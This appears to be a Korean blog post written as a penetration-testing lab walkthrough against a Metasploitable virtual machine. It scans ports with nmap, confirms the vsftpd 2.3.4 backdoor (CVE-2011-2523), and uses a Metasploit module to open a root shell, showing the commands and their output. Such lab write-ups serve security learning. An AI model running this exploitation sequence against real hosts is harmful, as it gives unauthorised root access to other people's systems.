모의해킹 및 보안
FTP Exploit
잉여토끼
2024. 10. 24. 11:43
nmap을 통한 버전 스캔
┌──(root㉿kaya)-[~]
└─# nmap -sV 172.16.20.14 -v
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 11:15 KST
NSE: Loaded 46 scripts for scanning.
Initiating ARP Ping Scan at 11:15
Scanning 172.16.20.14 [1 port]
Completed ARP Ping Scan at 11:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:15
Completed Parallel DNS resolution of 1 host. at 11:15, 0.00s elapsed
Initiating SYN Stealth Scan at 11:15
Scanning 172.16.20.14 [1000 ports]
Discovered open port 445/tcp on 172.16.20.14
Discovered open port 139/tcp on 172.16.20.14
Discovered open port 25/tcp on 172.16.20.14
Discovered open port 23/tcp on 172.16.20.14
Discovered open port 3306/tcp on 172.16.20.14
Discovered open port 21/tcp on 172.16.20.14
Discovered open port 5900/tcp on 172.16.20.14
Discovered open port 111/tcp on 172.16.20.14
Discovered open port 53/tcp on 172.16.20.14
Discovered open port 22/tcp on 172.16.20.14
Discovered open port 80/tcp on 172.16.20.14
Discovered open port 514/tcp on 172.16.20.14
Discovered open port 1099/tcp on 172.16.20.14
Discovered open port 2049/tcp on 172.16.20.14
Discovered open port 2121/tcp on 172.16.20.14
Discovered open port 1524/tcp on 172.16.20.14
Discovered open port 6667/tcp on 172.16.20.14
Discovered open port 5432/tcp on 172.16.20.14
Discovered open port 6000/tcp on 172.16.20.14
Discovered open port 8009/tcp on 172.16.20.14
Discovered open port 8180/tcp on 172.16.20.14
Discovered open port 512/tcp on 172.16.20.14
Discovered open port 513/tcp on 172.16.20.14
Completed SYN Stealth Scan at 11:15, 0.06s elapsed (1000 total ports)
Initiating Service scan at 11:15
Scanning 23 services on 172.16.20.14
Completed Service scan at 11:15, 11.14s elapsed (23 services on 1 host)
NSE: Script scanning 172.16.20.14.
Initiating NSE at 11:15
Completed NSE at 11:15, 0.09s elapsed
Initiating NSE at 11:15
Completed NSE at 11:15, 0.02s elapsed
Nmap scan report for 172.16.20.14
Host is up (0.00090s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5-log
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:7B:14:1A (VMware)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.120KB)
ftp 버전이 vsftpd 2.3.4임을 확인
CVE-2011-2523이 존재
https://www.cve.org/CVERecord?id=CVE-2011-2523
TCP 6200번 포트를 이용한 쉘 백도어 취약점
nmap nse ftp-vsftpd-backdoor 를 이용하여 취약점 탐색
┌──(root㉿kaya)-[~]
└─# nmap --script ftp-vsftpd-backdoor -p 21 172.16.20.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 11:19 KST
Nmap scan report for 172.16.20.14
Host is up (0.00035s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://www.securityfocus.com/bid/48539
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 00:0C:29:7B:14:1A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.21 seconds
해당 취약점이 유효함을 확인
msf 를 이용한 Exploit
vsftpd 검색
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor
2개의 모듈이 검색됨.
vsftpd 2.3.4에 해당하는 공격 모듈을 확인 가능
모듈 선택 및 payload 확인
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
set으로 필수 payload(RHOSTS) 설정
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.16.20.14
RHOSTS => 172.16.20.14
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 172.16.20.14 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
공격 실행
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] 172.16.20.14:21 - Banner: 220 (vsFTPd 2.3.4)
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > [*] 172.16.20.14:21 - USER: 331 Please specify the password.
[+] 172.16.20.14:21 - Backdoor service has been spawned, handling...
[+] 172.16.20.14:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.20.10:36539 -> 172.16.20.14:6200) at 2024-10-24 11:30:25 +0900
session을 획득한것을 확인.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 172.16.20.10:36539 -> 172.16.20.14:62
00 (172.16.20.14)
해당 세션을 이용하여 접속
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 1
[*] Starting interaction with 1...
help
Meta shell commands
===================
Command Description
------- -----------
help Help menu
background Backgrounds the current shell session
sessions Quickly switch to another session
resource Run a meta commands script stored in a local file
shell Spawn an interactive shell (*NIX Only)
download Download files
upload Upload files
source Run a shell script on remote machine (*NIX Only)
irb Open an interactive Ruby shell on the current session
pry Open the Pry debugger on the current session
For more info on a specific command, use <command> -h or help <command>.
meterpriter 명령이 사용되는것을 확인.